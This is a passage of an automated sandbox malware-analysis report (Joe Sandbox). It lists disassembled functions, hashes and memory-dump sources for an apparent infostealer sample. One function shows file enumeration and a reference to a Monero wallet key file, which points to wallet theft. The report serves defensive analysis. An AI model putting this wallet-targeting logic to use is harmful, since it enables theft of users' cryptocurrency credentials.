                      • Instruction ID: 43dead98bc2ab33dd957dc5f9b3f5f8fbdbf85860bb0693212688404aba78b8b
                      • Opcode Fuzzy Hash: f287669d1038235c5982cf4779a92483f723e06df1000467b13736cdc343c2ec
                      • Instruction Fuzzy Hash: EAB2D9F390C2049FE304AE29DC8577ABBE5EF94720F1A892DE6C4C7744EA7598058787
                      Function 00815178 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *9$^r}
                      • API String ID: 0-1379781516
                      • Opcode ID: e88d2f7116b3380c62c5947fef681ebffa157fd25a692122a1f5cb06ddf35917
                      • Instruction ID: ed75f4c1d718d70500e15f0643bf50e16b0f248a95cbe396d9b29ef248015337
                      • Opcode Fuzzy Hash: e88d2f7116b3380c62c5947fef681ebffa157fd25a692122a1f5cb06ddf35917
                      • Instruction Fuzzy Hash: 90715AB3A185104FF314692DDC457BABAD6DBD4330F2B463DEA88D3784E9394C058285
                      Function 0089171F Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: C$r7~
                      • API String ID: 0-3129029804
                      • Opcode ID: 7b02e675fd7ef091c8af83fda018e9dce808090002302e720df0c24faad9bb54
                      • Instruction ID: 3b9c75f2b4d958df6f94cc3e9f02ea38c6082084dd8e3eab35031e260f28a8c7
                      • Opcode Fuzzy Hash: 7b02e675fd7ef091c8af83fda018e9dce808090002302e720df0c24faad9bb54
                      • Instruction Fuzzy Hash: C72107B250D30EAFDF00BE158959A7A7AEDFB41318F280829E587C6600E2715D54A656
                      Function 0046F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004815B8,00480D96), ref: 0046F71E
                      • StrCmpCA.SHLWAPI(?,004815BC), ref: 0046F76F
                      • StrCmpCA.SHLWAPI(?,004815C0), ref: 0046F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0046FAC3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 25c29c1546c457a8ad7bcbd5dc12ce0d2ebdc1edbee160c13b0bc262f86ce57d
                      • Instruction ID: 6563d5b208e40758e3d76e1af88bd4e8e96e8e4b2987cf703fbb6564713c7896
                      • Opcode Fuzzy Hash: 25c29c1546c457a8ad7bcbd5dc12ce0d2ebdc1edbee160c13b0bc262f86ce57d
                      • Instruction Fuzzy Hash: E911B77080010CABDB14FBB1DC559EE7378AF50304F5186AFA51E56092EF382B1ACBA7
                      Function 007CF201 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: sZ?
                      • API String ID: 0-2346340252
                      • Opcode ID: 66cdcd1d76a6802b8067663dc636f023997d4455d3eb82093b9845a3b2f6581e
                      • Instruction ID: 74a40012f217c2b35455f40320e0681349383d40db77956004f2622219bf4c1b
                      • Opcode Fuzzy Hash: 66cdcd1d76a6802b8067663dc636f023997d4455d3eb82093b9845a3b2f6581e
                      • Instruction Fuzzy Hash: B93133F7F096201BF308883DDD8872676D6D3D4321F2A823EEA4597BC8EC795C094285
                      Function 0082979E Relevance: .8, Instructions: 847COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da124e022ad32c0c21ea6043963b057e2386b158cffd2cd3ec0de1a0f4a608d7
                      • Instruction ID: ac9f111d01e3812841255bb34fa32caa4baece1b6fd5003ff9d645698c207844
                      • Opcode Fuzzy Hash: da124e022ad32c0c21ea6043963b057e2386b158cffd2cd3ec0de1a0f4a608d7
                      • Instruction Fuzzy Hash: 984205F3A0C2149FE7046F29EC8567ABBE9EF94320F16493DEAC493744EA3558018797
                      Function 006FE859 Relevance: .2, Instructions: 244COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 596695106ae1e1636638a2932874c33c73455c0b08245aea9d849a315b7a7974
                      • Instruction ID: 7bfe748fe68afccd7a1c292c0914c7fcfd2fffab56ced1e35217725373c38507
                      • Opcode Fuzzy Hash: 596695106ae1e1636638a2932874c33c73455c0b08245aea9d849a315b7a7974
                      • Instruction Fuzzy Hash: E6612CB3A0C2146FF3046A6DEC45B7BB7D9DBC4770F2A423DEA94C3780E93558058696
                      Function 0072FB7E Relevance: .2, Instructions: 235COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eec1c907b63519b9957a8d52e0ebb9ed81b1cbe95a7d9a5c5202e7cd1feefa0f
                      • Instruction ID: 9f27c11480a6f830129bfd470985301fbba349611ca89c3fc3ebae2f4e2b8dcd
                      • Opcode Fuzzy Hash: eec1c907b63519b9957a8d52e0ebb9ed81b1cbe95a7d9a5c5202e7cd1feefa0f
                      • Instruction Fuzzy Hash: 2D7126F3E086048FF3046E38DC84766B6D5EB94310F1A863DDAC8D7784E97A9D468682
                      Function 006D7FEC Relevance: .2, Instructions: 200COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6636fd2c54338e16cb01f3c99d1ee7045250937e8bb6b82cf6c03f6243b01d5
                      • Instruction ID: d0acdccede97b74fe5793a5cfaaa0ca4e3905bc9ab586abb24c609c22945aa83
                      • Opcode Fuzzy Hash: d6636fd2c54338e16cb01f3c99d1ee7045250937e8bb6b82cf6c03f6243b01d5
                      • Instruction Fuzzy Hash: 8D5167F3D082204BE3186A2DDC5536AB7E5DBD0320F2B463DEEC5A7384E93A5C4186C6
                      Function 0072B754 Relevance: .2, Instructions: 190COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cbe85fcbaa6f7551f87c5a93e9b1ca67ddffae9f3599d1b593fe367da174be86
                      • Instruction ID: 7aea118a593b7dc61a28cb16a90227f0cd87fae9109007b2d2839a9eccff845f
                      • Opcode Fuzzy Hash: cbe85fcbaa6f7551f87c5a93e9b1ca67ddffae9f3599d1b593fe367da174be86
                      • Instruction Fuzzy Hash: E4517DF3E081049BE704AE3DDC0577BBBA6DBD0320F1A863DE6D4977C8E93958058686
                      Function 008E3F62 Relevance: .2, Instructions: 171COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a97b191731f40872dd52c1b34a63bd2bfda4f9c95931d5fc4a0d983161a45cc3
                      • Instruction ID: 68ada515132c1e5d836974d18e78b6c54dace3b57fec0969254dff51938a0957
                      • Opcode Fuzzy Hash: a97b191731f40872dd52c1b34a63bd2bfda4f9c95931d5fc4a0d983161a45cc3
                      • Instruction Fuzzy Hash: 0541CBF391C64D9FD3545E2A9C4963BB6E4FB86328F35063DE292D7B44F9718D009282
                      Function 007C8A9E Relevance: .2, Instructions: 154COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d79908adf1086acd139cc5cdb2a27021a348ce0d7c488b0b296925c12624d5dd
                      • Instruction ID: d1b86eae5683ef617227ac055a6e640039a9d955e5041ebe1ee9ece425714b66
                      • Opcode Fuzzy Hash: d79908adf1086acd139cc5cdb2a27021a348ce0d7c488b0b296925c12624d5dd
                      • Instruction Fuzzy Hash: 05416AF3A0C3009BE3486E2DED95737B7D6EB84720F25843DE985C3384E97598014656
                      Function 00479750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
